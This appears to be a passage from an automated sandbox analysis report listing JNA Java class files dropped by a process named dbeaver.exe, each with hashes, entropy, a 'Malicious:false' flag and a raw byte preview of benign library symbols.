      Category:dropped
      Size (bytes):1215
      Entropy (8bit):5.367954103697646
      Encrypted:false
      SSDEEP:
      MD5:CE7CB1DE95BF6555BDA1C6E982DE7EE9
      SHA1:4BF9918F8E9927D0484B418C23CDC0EB43888B17
      SHA-256:8EA4F4DC4A40A97B8EAC4432569B3AC7FE7734C34991D7AD75B028E587591776
      SHA-512:7AD02D292C8B0CA9CFD681EFEC044C75D75E05F19B181E317094771B0A8D4EFABAD25D4E31700C977825D5D4CBE0D61345E0C6A136349F99466763DD99A708C9
      Malicious:false
      Reputation:unknown
      Preview:.......2.A....!.. ."..#.$..%....!..&....'....(..)....*..+.,..-.....0...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$1;...uncaughtException...(Lcom/sun/jna/Callback;Ljava/lang/Throwable;)V...c...Lcom/sun/jna/Callback;...e...Ljava/lang/Throwable;...SourceFile...Native.java...EnclosingMethod..2.......3.4..5..6.7...java/lang/StringBuilder...JNA: Callback ..8.9..8.:... threw the following exception..;.<..=..>.?...com/sun/jna/Native$1...java/lang/Object..@..-com/sun/jna/Callback$UncaughtExceptionHandler...UncaughtExceptionHandler...com/sun/jna/Native...access$000...()Ljava/util/logging/Logger;...java/util/logging/Level...WARNING...Ljava/util/logging/Level;...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..-(Ljava/lang/Object;)Ljava/lang/StringBuilder;...toString...()Ljava/lang/String;...java/util/logging/Logger...log..C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V...com/sun/jna/Callback.0.................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):518
      Entropy (8bit):4.841906187615902
      Encrypted:false
      SSDEEP:
      MD5:64A292D1884F937D44A7CE736BFE7C29
      SHA1:D707C460C4AF2DE275174E6D9EFD5FE7E0BE3E8F
      SHA-256:8BE67DBDB96826FC61FC9F07F05B009D619EBBD75FFA9A0B78D585B0D4B419D7
      SHA-512:113B71A54966793E810E6CF4FEC51D360814FB852C671F2A547E13655FC2D3B47BEAF561CE7D6BFA67A7A989C87D9656FB823AD010D7F6DAEFDC7D743366055C
      Malicious:false
      Reputation:unknown
      Preview:.......2..........................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$2;...finalize...Exceptions......SourceFile...Native.java...EnclosingMethod.....................com/sun/jna/Native$2...java/lang/Object...java/lang/Throwable...com/sun/jna/Native...access$100.0......................./........*...................................................:...........*............................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1280
      Entropy (8bit):5.367479835628207
      Encrypted:false
      SSDEEP:
      MD5:C060A2EDC69BA803C8C99D214097ECAA
      SHA1:04326678A3A5CEA590A1510294F01D634446B750
      SHA-256:DB1793D2A69BDE21977419C79AD93C3DD1FF98E95DE810A2F0EB9A56717B1CCE
      SHA-512:1C2CF828F4BD9BCC86FC04E93AE8F7A46D3CAF397610C35D37B8518B32942237B53B25D7D7591F569E431FCC472534D2400FA239C47ADA939DA0A8F33F888551
      Malicious:false
      Reputation:unknown
      Preview:.......2.?....,....-........./....0..1..2..3...val$handler..5...Handler...InnerClasses...Lcom/sun/jna/Library$Handler;...val$library...Lcom/sun/jna/Library;...<init>..5(Lcom/sun/jna/Library$Handler;Lcom/sun/jna/Library;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/Native$3;...invoke..S(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object;...proxy...Ljava/lang/Object;...method...Ljava/lang/reflect/Method;...args...[Ljava/lang/Object;...StackMapTable..1..2..6.....7...Exceptions..7...SourceFile...Native.java...EnclosingMethod..8..9.:..............;..<.=........com/sun/jna/Native$3...java/lang/Object..#java/lang/reflect/InvocationHandler..>...com/sun/jna/Library$Handler...java/lang/reflect/Method...java/lang/Throwable...com/sun/jna/Native...synchronizedLibrary..,(Lcom/sun/jna/Library;)Lcom/sun/jna/Library;...()V...getNativeLibrary...()Lcom/sun/jna/NativeLibrary;...com/sun/jna/Library.0.........................................9........*+
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1186
      Entropy (8bit):5.257594660527779
      Encrypted:false
      SSDEEP:
      MD5:4F09B9077E273FF8D363A0EBCCA0A376
      SHA1:8DE8CD62A49E42274100BA799294C10412CD7311
      SHA-256:A9B5738BD857CCD12AC242601899A051C70B11E523C975D140371006A8979211
      SHA-512:1B65537ACAE328501071C523FD54B6253E5FAEC50E1D7B89381264F01B9BCE905DCD6C664BFC8546C24850E366FB42BA032E0AAD7983A7A6E65CFF8D72A58E15
      Malicious:false
      Reputation:unknown
      Preview:.......2.:....%..&..'..(..)....*..+.,..-......./..0..1...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$4;...run...()Ljava/lang/reflect/Method;...m...Ljava/lang/reflect/Method;...e...Ljava/lang/Exception;...StackMapTable..-...()Ljava/lang/Object;...Signature..NLjava/lang/Object;Ljava/security/PrivilegedAction<Ljava/lang/reflect/Method;>;...SourceFile...Native.java...EnclosingMethod..2..3.4........java/lang/ClassLoader...findLibrary...java/lang/Class...java/lang/String..5.6..7..8.9...java/lang/Exception........com/sun/jna/Native$4...java/lang/Object...java/security/PrivilegedAction...com/sun/jna/Native...getWebStartLibraryPath..&(Ljava/lang/String;)Ljava/lang/String;...getDeclaredMethod..@(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;...java/lang/reflect/Method...setAccessible...(Z)V.0........................./........*...................................................}................Y...S...L+....+.L...........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):744
      Entropy (8bit):5.135887535604251
      Encrypted:false
      SSDEEP:
      MD5:50D3D187039529013180AC5BFC1EA3FC
      SHA1:816C053A8A1876F04888E5D57207B0BAA4F9D86E
      SHA-256:A5F2F88080B8FD820BB940AF510792125129D9B29777341AF4C9CBE8CE1F6D10
      SHA-512:E479D9EA66B0558F4F187E680D07FB69B9C8258C3246DE080E430BF2EF1E75AD53CF7EA60A72C5D53CB85FB247FBB643DD3C8C186C3CB71E89F12020443EFBD5
      Malicious:false
      Reputation:unknown
      Preview:.......2.,............. .!..".. .#..$..%..&...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$5;...accept..#(Ljava/io/File;Ljava/lang/String;)Z...dir...Ljava/io/File;...name...Ljava/lang/String;...StackMapTable...SourceFile...Native.java...EnclosingMethod..'.....com/sun/jna/Native.........x..(..).*...jna..+.*...com/sun/jna/Native$5...java/lang/Object...java/io/FilenameFilter...removeTemporaryFiles...java/lang/String...endsWith...(Ljava/lang/String;)Z...startsWith.0........................./........*...................X...............................a........,........,.............................[..... .........................................@.....................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):566
      Entropy (8bit):4.936785579924397
      Encrypted:false
      SSDEEP:
      MD5:26963669F06740A21E2B1EC8F67FE95F
      SHA1:C464895E90FF32DBEF1101A023960CBCC816910D
      SHA-256:DCB6FD339C87611272E6C8084053E1FCB14CCB68E3C7C282D81EC887D0DC80FC
      SHA-512:9D55F08263CAC1A389BBC406DBA5E82B3443E51E7C22EC2D0E79055CC5BED0BEA9840AA47B79AE44F5E1CEB6C768342CDB3E496F84D7DA8026FE05D1B3B4F573
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$6;...getClassContext...()[Ljava/lang/Class;...Signature...()[Ljava/lang/Class<*>;...SourceFile...Native.java...EnclosingMethod.....................com/sun/jna/Native$6...java/lang/SecurityManager...com/sun/jna/Native...getCallingClass...()Ljava/lang/Class;.0......................./........*.................................................../........*..................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):747
      Entropy (8bit):4.990870533941797
      Encrypted:false
      SSDEEP:
      MD5:8DDE60866DB3FDF7C7ECF2A8CB7A681D
      SHA1:76BFA3079A70331D3A97CCCFDBB0ED3E44A7E04F
      SHA-256:496E17423DE7ECA9202DD032BD85116EA6D91F2F3DCF359B944BF660F8A683CE
      SHA-512:8FE3F31092AE3A9F5D041C1D39C09397FC9F02FBD7F24CC1B6994F512C9A0347FB1F3D580C4EFEFC24AF4DFE511BCCC26A7334A93FD1EEF5A4F741F7AFE37BD6
      Malicious:false
      Reputation:unknown
      Preview:.......2.'.......................... ....!.."..#...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Native$7;...initialValue...()Lcom/sun/jna/Memory;...m...Lcom/sun/jna/Memory;...()Ljava/lang/Object;...Signature..-Ljava/lang/ThreadLocal<Lcom/sun/jna/Memory;>;...SourceFile...Native.java...EnclosingMethod..$........com/sun/jna/Memory....%..&..........com/sun/jna/Native$7...java/lang/ThreadLocal...com/sun/jna/Native...(J)V...clear.0......................./........*...................................................M...........Y......L+...+......................................................D.........../........*..................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1570
      Entropy (8bit):5.567122486019817
      Encrypted:false
      SSDEEP:
      MD5:58EC589EB52D374A95BD0F3F3FC85E2F
      SHA1:87C02016B32B6616F4866FCD1B5952620E7D9308
      SHA-256:EAC9607B74D97FE3BEE8DA179A18E7C5E274DB1E623B3F00D845E8378BA3CB9F
      SHA-512:B7BCD269110FC55823F34E89FF178F8C4927BF5FC66DD640517C7E3B47897471211FD6296BE17BFD1D8F8E44C2DFDC0492F4F89181141A50395D857DCC097395
      Malicious:false
      Reputation:unknown
      Preview:.......2.`....2....3..4.5..6..7....8..9....:..;..<....8....=..>..?....8..@.A..B..C.D..E..F.G....H..I..J.K..L..M...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...AWT...InnerClasses...Lcom/sun/jna/Native$AWT;...getWindowID...(Ljava/awt/Window;)J...w...Ljava/awt/Window;...Exceptions...getComponentID...(Ljava/lang/Object;)J...o...Ljava/lang/Object;...c...Ljava/awt/Component;...StackMapTable..9...SourceFile...Native.java.......(.)..N..O.P...java/awt/HeadlessException...No native windows when headless....Q...java/awt/Component..R.P.."java/lang/IllegalArgumentException...Component must be heavyweight..S.P...java/lang/IllegalStateException...Component must be displayable..T..U.P...java.version..V..W.X...1.4..Y..Z.[..\.P...Component must be visible..]..^._...com/sun/jna/Native$AWT...java/lang/Object...java/awt/GraphicsEnvironment...isHeadless...()Z...(Ljava/lang/String;)V...isLightweight...isDisplayable...com/sun/jna/Platform...isX11...java/lang/System...getProperty..&(Ljav
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):654
      Entropy (8bit):5.044239476797102
      Encrypted:false
      SSDEEP:
      MD5:6EA2E3C5F4F1A951F691F99B8D8FBA91
      SHA1:9DCF200664EE9A4E432C25E20B882054D924B7D3
      SHA-256:D82F6E9D668C79D02064A9972E38F7A66F3D7BA3D9C27E13A6EC62CBC2005253
      SHA-512:1DCBEED18CA01D8B0842BA2F8FE70DC2CA98D19E4308376EE14287E73BE48CDE2E15DBE9716A478A7888F3632F686F35FDDDDB327997F25CAEAE9E2E90750D33
      Malicious:false
      Reputation:unknown
      Preview:.......2.#......................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Buffers...InnerClasses...Lcom/sun/jna/Native$Buffers;...isBuffer...(Ljava/lang/Class;)Z...cls...Ljava/lang/Class;...LocalVariableTypeTable...Ljava/lang/Class<*>;...Signature...(Ljava/lang/Class<*>;)Z...SourceFile...Native.java........java/nio/Buffer.. ..!...."...com/sun/jna/Native$Buffers...java/lang/Object...java/lang/Class...isAssignableFrom...com/sun/jna/Native. ......................./........*...................H...............................C..........*...................J......................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):214
      Entropy (8bit):4.89531539563325
      Encrypted:false
      SSDEEP:
      MD5:5C9E88AA08E9D58F536C54F85DDC6F21
      SHA1:39C8DB30E803AC5EDE10B06357EE2071E2D00AD1
      SHA-256:FF114A0D65A1C63DE46C26EDAE8D27D2110F48E33F4179AC8DFEA9E3D933CEDF
      SHA-512:76C660C8E519F2983BFF40139F3A627B700944230517768B18B44BEC5EEE02742D60BEF4692B77DDFC395AFACE8E964283D13F5E85919D3BB03E7BBB9F5B012F
      Malicious:false
      Reputation:unknown
      Preview:.......2...........invoke...(JJJ)V...SourceFile...Native.java......com/sun/jna/Native$ffi_callback...ffi_callback...InnerClasses...java/lang/Object...com/sun/jna/Native..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):50127
      Entropy (8bit):6.191455740339294
      Encrypted:false
      SSDEEP:
      MD5:BF3E3778D54AF5D135CB4B5553CE6C40
      SHA1:F7FAA675F5A427A8DC8CD24459F1FC217EB85061
      SHA-256:6F56C0D3ABDA1FA760CCA289170372D1C79ACAA50B71EE5A05BB1C72F8427835
      SHA-512:15AE17376AFD2BA3AFB06AD0BEECC65D1C20900DA5EF580FB33912115489170BA5B90884F4B517B54601E274FB0EEF2D39F45D7F61FDE2337AB2E9F0318D9327
      Malicious:false
      Reputation:unknown
      Preview:.......2.w..Y....Y.......'....q...................Y....Y....................Y...........................Y............................................Y.........Y....Y....Y....Y..........'....'....Y.......+.........Y....Y............@..........4.......4....@..........4....3.......=....@............Y....@....Y....Y....Y....X....@..............Y.................M....X..........4..........Y....X.....................@....Y....@....Y.......@..........c................i.............Y......................@....Y.......Y............q....Y....Y....'....Y....Y.........'.......:....Y.......................................................................'. ....!...."..Y.#..$....%..&..'....(..)..*..+.,..-..'..../..'.0..'.1..2..3.......4..5..:.6..+.7..8....9..:....;..<..Y.=..>.......+.?..@..A..+.B..C..Y.D..E..Y.F..G..Y.H............I..'.J..Y.K..Y.L..'.M....N....O..P.Q..P.R..S....T..'.U..V.W..X..Y..'.Z..[..\..]..^...._..`.a.......b..c.......d..e.f..'.g..A..'.h..i..e...........j..k..e.l..m..n..e.o..p..Y
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):733
      Entropy (8bit):5.0842756159764235
      Encrypted:false
      SSDEEP:
      MD5:F3C9B73D40156D1664A65D482B2FF5A0
      SHA1:77C136347872540468A7CC76D38E690078C65BE1
      SHA-256:6BB10F4FFFD966828526FD8A980BC01CC81E5B97A24F37B21674A441AD8E7E5F
      SHA-512:9796595876763D27FFED13B24272FA010CCE0388CA503CFEA1549BEDAAE5E33860F8F6CF776658E7C6CC32DF9AFBCEFD8292FA1DC842CC6E56F7F992317519AE
      Malicious:false
      Reputation:unknown
      Preview:.......2.$......................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/NativeLibrary$1;...getSymbolAddress..2(JLjava/lang/String;Lcom/sun/jna/SymbolProvider;)J...handle...J...name...Ljava/lang/String;...parent...Lcom/sun/jna/SymbolProvider;...SourceFile...NativeLibrary.java...EnclosingMethod.. .......!..".#...com/sun/jna/NativeLibrary$1...java/lang/Object...com/sun/jna/SymbolProvider...com/sun/jna/NativeLibrary...com/sun/jna/Native...findSymbol...(JLjava/lang/String;)J.0........................./........*...................[...............................N.........-...................^.....*..............................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1931
      Entropy (8bit):5.186405551012837
      Encrypted:false
      SSDEEP:
      MD5:7FFAEDD56058534F591E5581977C1388
      SHA1:9182889D6E8563106EC22E491F742ADBD61392C9
      SHA-256:6BF050FAD9C29F5FAEC93CC8E86672D17A5B199165EEDFE1A364904D77D5CA20
      SHA-512:DFA4CD8C542E475177CA2C676A3688073A94CA698B356AC16CCB3E9C45C4063BDCEDDE76261DC675250A5F78566FDD7BE7F2C9FBE81B4068BED3D107CE685BDA
      Malicious:false
      Reputation:unknown
      Preview:.......2.E....4....5..6.7..8.9..:..;...this$0...Lcom/sun/jna/NativeLibrary;...<init>..^(Lcom/sun/jna/NativeLibrary;Lcom/sun/jna/NativeLibrary;Ljava/lang/String;ILjava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/NativeLibrary$2;...library...functionName...Ljava/lang/String;...callFlags...I...encoding...invoke..:([Ljava/lang/Object;Ljava/lang/Class;ZI)Ljava/lang/Object;...args...[Ljava/lang/Object;...returnType...Ljava/lang/Class;...b...Z...fixedArgs...LocalVariableTypeTable...Ljava/lang/Class<*>;...Signature..=([Ljava/lang/Object;Ljava/lang/Class<*>;ZI)Ljava/lang/Object;..s(Ljava/lang/reflect/Method;[Ljava/lang/Class;Ljava/lang/Class;[Ljava/lang/Object;Ljava/util/Map;)Ljava/lang/Object;...invokingMethod...Ljava/lang/reflect/Method;...paramTypes...[Ljava/lang/Class;...inArgs...options...Ljava/util/Map;...[Ljava/lang/Class<*>;..$Ljava/util/Map<Ljava/lang/String;*>;...(Ljava/lang/reflect/Method;[Ljava/lang/Class<*>;Ljava/lang/Class<*>;[
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1123
      Entropy (8bit):5.363443755076963
      Encrypted:false
      SSDEEP:
      MD5:47BD1A163AEE1A8D04222A3C22163B31
      SHA1:E6322A3EF99F1524F21F4872AD5CF11C493B5D35
      SHA-256:41FACC71FD42BA2EEAAB82CBC7295848B7F5C30907001ADAAE0F96E938060322
      SHA-512:68C8A9397DE1B293F69A77406851C1D9F3CFA82CD11150C2FCD11668DEDD240B645015E0CB0558DA8FD0F5157FDFD30B49E954335A99FA3CF13CB0B5025E6D3C
      Malicious:false
      Reputation:unknown
      Preview:.......2.<....#....$..%....$..&....'..(....)..*.+..!.,..-...../...val$libName...Ljava/lang/String;...<init>...(Ljava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/NativeLibrary$3;...accept..#(Ljava/io/File;Ljava/lang/String;)Z...dir...Ljava/io/File;...filename...StackMapTable...SourceFile...NativeLibrary.java...EnclosingMethod..0..1.2.........3...java/lang/StringBuilder...lib..4.5....so..6.7..8..9.:..;.:...com/sun/jna/NativeLibrary$3...java/lang/Object...java/io/FilenameFilter...com/sun/jna/NativeLibrary...matchLibrary..<(Ljava/lang/String;Ljava/util/Collection;)Ljava/lang/String;...()V...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...toString...()Ljava/lang/String;...java/lang/String...startsWith...(Ljava/lang/String;)Z...access$000.0.................................4........*+...*...................M.......................................X,...Y........*...................,,...Y...*....................*...........,.........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):728
      Entropy (8bit):5.194460130951878
      Encrypted:false
      SSDEEP:
      MD5:AF2CDF161F6656E687E10280B6D0162C
      SHA1:EFAE9E81B53D83161A115436F6D13F2FD22DC0EC
      SHA-256:BE9C9E1CA0FBD1C6A688ADC9829AAC87658BD435C2B3E142B2DB2BAF397D4B38
      SHA-512:E5BD0B352E6D70483FF73F3D3AFF3753B0AC7F8793BCD23ADCAE05504A1AC82893B8DEFAA4C4972631D309A21ABBCF2C1251E929915F167CEF50E905086DE850
      Malicious:false
      Reputation:unknown
      Preview:.......2.$...........................handle...J...<init>...(J)V...Code...LineNumberTable...LocalVariableTable...this...NativeLibraryDisposer...InnerClasses..1Lcom/sun/jna/NativeLibrary$NativeLibraryDisposer;...run...()V...StackMapTable.. ...SourceFile...NativeLibrary.java............!.."....#../com/sun/jna/NativeLibrary$NativeLibraryDisposer...java/lang/Object...java/lang/Runnable...java/lang/Throwable...com/sun/jna/Native...close...com/sun/jna/NativeLibrary.0.................................F........*...*....................$...%...&.............................!...........x.......!*........*......*.......L*....+.........................)...+...-.......-..... .0...........!..............X..............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):25857
      Entropy (8bit):6.0900060289330264
      Encrypted:false
      SSDEEP:
      MD5:47A5C48DFB6949F060592FA04DBDE218
      SHA1:0164CDF74710BA50A9107BB98779354F98559960
      SHA-256:EF46A20938E35E57478090EAE2BBD85A952CC2FCF29D8A755F18140B3E965C96
      SHA-512:773401A0DB63529D16767338CBAD4A1DE487D63D16290C77E34B70757FA09240D9A04F21D64F8F8B14631833FDD74E8E0CB43E0D9D2A19DD0350477F9C8E423C
      Malicious:false
      Reputation:unknown
      Preview:.......2..../.L..M....N....O..P....Q....R..u.N..S....N../.T../.U../.V../.W../.X..Y.Z..[....\..Y.]../.^.._..`..a.b..c....d..e../.f../.g..h..i../.j..k..l../.m../.n..o.p..q.r..s....t....u..v..w..).x../.y..a.z..{..|../.}../.~................5.N.....7....7.......:.N../..../.......:....o.......:.............../..../.......o..........J......./.........>.......J....q............q....q......./....q............/................o....7....o....o.......f..........>....................m..../........../..../.....................x..................7.........7....7....7............................../................................../...................q....q..../.............../............/..../..../........./.................................. ..../......................./......\...........!..................a....:........./.........N..a.................a....A............7........................7..................................... ..!...."..#.$..7.%..&.'..(.......)....N..7.*................/.+..,.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):720
      Entropy (8bit):4.799531266231296
      Encrypted:false
      SSDEEP:
      MD5:F0DAAE2CC650D9F2AD5170F92D4D661E
      SHA1:D07C53C83F08788D91C2F3D7F80ED904F0F8C397
      SHA-256:3486C03FC33896D9AE239883A6DB7D5CEDB0CB9CF007BC24C6C4A2E3BD67C7A3
      SHA-512:97760C1AA89E8C20EE7291633B548B8FC5568F9AAFE6B45EEDC6663EBBC8FE113520592F6E6106F0ADE64E48B2BC7FFF6445460980B1C41F6E66757DA078258F
      Malicious:false
      Reputation:unknown
      Preview:.......2.).............. ....!..".#..$..%...serialVersionUID...J...ConstantValue............SIZE...I...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/NativeLong;...(J)V...value...(JZ)V...unsigned...Z...<clinit>...SourceFile...NativeLong.java...................&..'..(.....com/sun/jna/NativeLong...com/sun/jna/IntegerType...(IJZ)V...com/sun/jna/Native...LONG_SIZE.!...............................................4........*....................'...(...............................?........*.....................,...-.........................................L........*........................1...2..... ............................................................................#..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):340
      Entropy (8bit):5.074379207281326
      Encrypted:false
      SSDEEP:
      MD5:95005563F8CF7885FF4B15FEF017AEFC
      SHA1:D9C6AD9D84F5DD0EBB1F547EB944D290708FE776
      SHA-256:CCE0FDEE9074FF6A0910CDF4105DBA004C5C92387AAE418EB0A07489D6CC5E32
      SHA-512:47F0FE79190D939C3298B848713FCD38A9C1D00182F924F45A667EC38209F4433C00387D3009EE848E9A1E6075FE1CE13B7E8F84851F3B8FA36FDDCE56C0AEE2
      Malicious:false
      Reputation:unknown
      Preview:.......2...........fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...toNative...()Ljava/lang/Object;...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...SourceFile...NativeMapped.java...com/sun/jna/NativeMapped...java/lang/Object......................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):3273
      Entropy (8bit):5.446085660533134
      Encrypted:false
      SSDEEP:
      MD5:4763DFE15D79F25A015BD3C2BEBE82F4
      SHA1:B87498F6CBFDD617667B7F86F93A3D490B70A484
      SHA-256:8DD9EF7BB1AD6AB6EC5D484C83F041CD2218546FA433CD7539BA814298E025BA
      SHA-512:C341AFD160FFAF2884AEADDACA6E3F3685B3F33AC1EA0D97D80EAFFC43A8130D07C99D05143C6420BF9D96EAA516D919E12273C6A7B3CA235B92F520D63A6D80
      Malicious:false
      Reputation:unknown
      Preview:.......2......W..X.Y..Z....[..\....]..^...._..X.`..".a..b..c.d..e..f....a..g....h....i....j....k....l....m....n....o....p..c.q..c.r..s.t....u..v....w..x.. .a..y..z...converters...Ljava/util/Map;...Signature..cLjava/util/Map<Ljava/lang/Class<*>;Ljava/lang/ref/Reference<Lcom/sun/jna/NativeMappedConverter;>;>;...type...Ljava/lang/Class;...Ljava/lang/Class<*>;...nativeType...instance...Lcom/sun/jna/NativeMapped;...getInstance..6(Ljava/lang/Class;)Lcom/sun/jna/NativeMappedConverter;...Code...LineNumberTable...LocalVariableTable...r...Ljava/lang/ref/Reference;...nmc..#Lcom/sun/jna/NativeMappedConverter;...cls...LocalVariableTypeTable..>Ljava/lang/ref/Reference<Lcom/sun/jna/NativeMappedConverter;>;...StackMapTable..y..Z..\..{..|..9(Ljava/lang/Class<*>;)Lcom/sun/jna/NativeMappedConverter;...<init>...(Ljava/lang/Class;)V...this...(Ljava/lang/Class<*>;)V...defaultValue...()Lcom/sun/jna/NativeMapped;...fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...nativeValu
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):614
      Entropy (8bit):5.053976103871264
      Encrypted:false
      SSDEEP:
      MD5:24B8A769FA8965DD7F17A8B09EBD6E69
      SHA1:38DD2976FE61D7F3CCE2B5BD45ACEBE0A78CF9EE
      SHA-256:9471C4124E99B2FCF32912A70E5328FFBC19F128A6C8A844649B54658E09F964
      SHA-512:728DF322805D53D201DBA73DA88C2D1722F009E733A07D5C42F6B5309CA6CA0E63319B24E2A293D4D81E7801006C92C90144F25CE84D324CFDAAED22CC3D1F3F
      Malicious:false
      Reputation:unknown
      Preview:.......2..........................this$0...Lcom/sun/jna/NativeString;...<init>...(Lcom/sun/jna/NativeString;J)V...Code...LineNumberTable...LocalVariableTable...this...StringMemory...InnerClasses..'Lcom/sun/jna/NativeString$StringMemory;...size...J...toString...()Ljava/lang/String;...SourceFile...NativeString.java....................%com/sun/jna/NativeString$StringMemory...com/sun/jna/Memory...(J)V...com/sun/jna/NativeString. ...............................?........*+...* ...................(.........................................2........*......................+............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2988
      Entropy (8bit):5.248021684903883
      Encrypted:false
      SSDEEP:
      MD5:7F4C793BE1E2E620B44A8ED40AE5F6CC
      SHA1:8B56BB376BA639AB9D6EF7A3BD4F53961B4A229E
      SHA-256:C66781C4099671D796880FE3F41A2EC3D8B5D21B68805EB9B692C609EBDDE515
      SHA-512:7359B5DAB9AE9A1375DEED29A9A62ABD17437A53AC300CDB4D98A949C78730F51CA376F085E72A1842DD8CA968B70EE68977D4077D1D5CC68213DD2FE456BCF7
      Malicious:false
      Reputation:unknown
      Preview:.......2....T.U....V..W..X..Y.Z....[..\..]....^...._..`.a..`.b..T.c..d....e....f..g.h..T.i..g.j..g.k....Z..`.l..m....n..g.o..g.p..`.q..`.r....Z..`.s..t..u...StringMemory...InnerClasses...WIDE_STRING...Ljava/lang/String;...ConstantValue...pointer...Lcom/sun/jna/Pointer;...encoding...<init>...(Ljava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/NativeString;...string...(Ljava/lang/String;Z)V...wide...Z...StackMapTable..v...(Lcom/sun/jna/WString;)V...Lcom/sun/jna/WString;..'(Ljava/lang/String;Ljava/lang/String;)V...len...I...data...[B..W...hashCode...()I...equals...(Ljava/lang/Object;)Z...other...Ljava/lang/Object;...toString...()Ljava/lang/String;...getPointer...()Lcom/sun/jna/Pointer;...charAt...(I)C...index...length...subSequence...(II)Ljava/lang/CharSequence;...start...end...compareTo...(Ljava/lang/Object;)I...SourceFile...NativeString.java..w..x.E..).8...com/sun/jna/NativeString...--WIDE-STRING--..y..D.E..).z...java/lang/NullPointerException...Str
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):7891
      Entropy (8bit):5.701674216718234
      Encrypted:false
      SSDEEP:
      MD5:9F92638B74DA444D8C3476FB54FF675C
      SHA1:59F38E224C72D068814E2811447924947A413EBD
      SHA-256:9555FE580C1B48D9BB9C0A17459A148AC6E99A445B45A61C4E798BA983600CFA
      SHA-512:1ABB5D646F9CC592252B754401AC424E8D9532AFEDBD0CB3976A0B80401F2956C3301D9D24F40121ACB738F665717C36F5E38DA888E6268C50FC18C84E9B8055
      Malicious:false
      Reputation:unknown
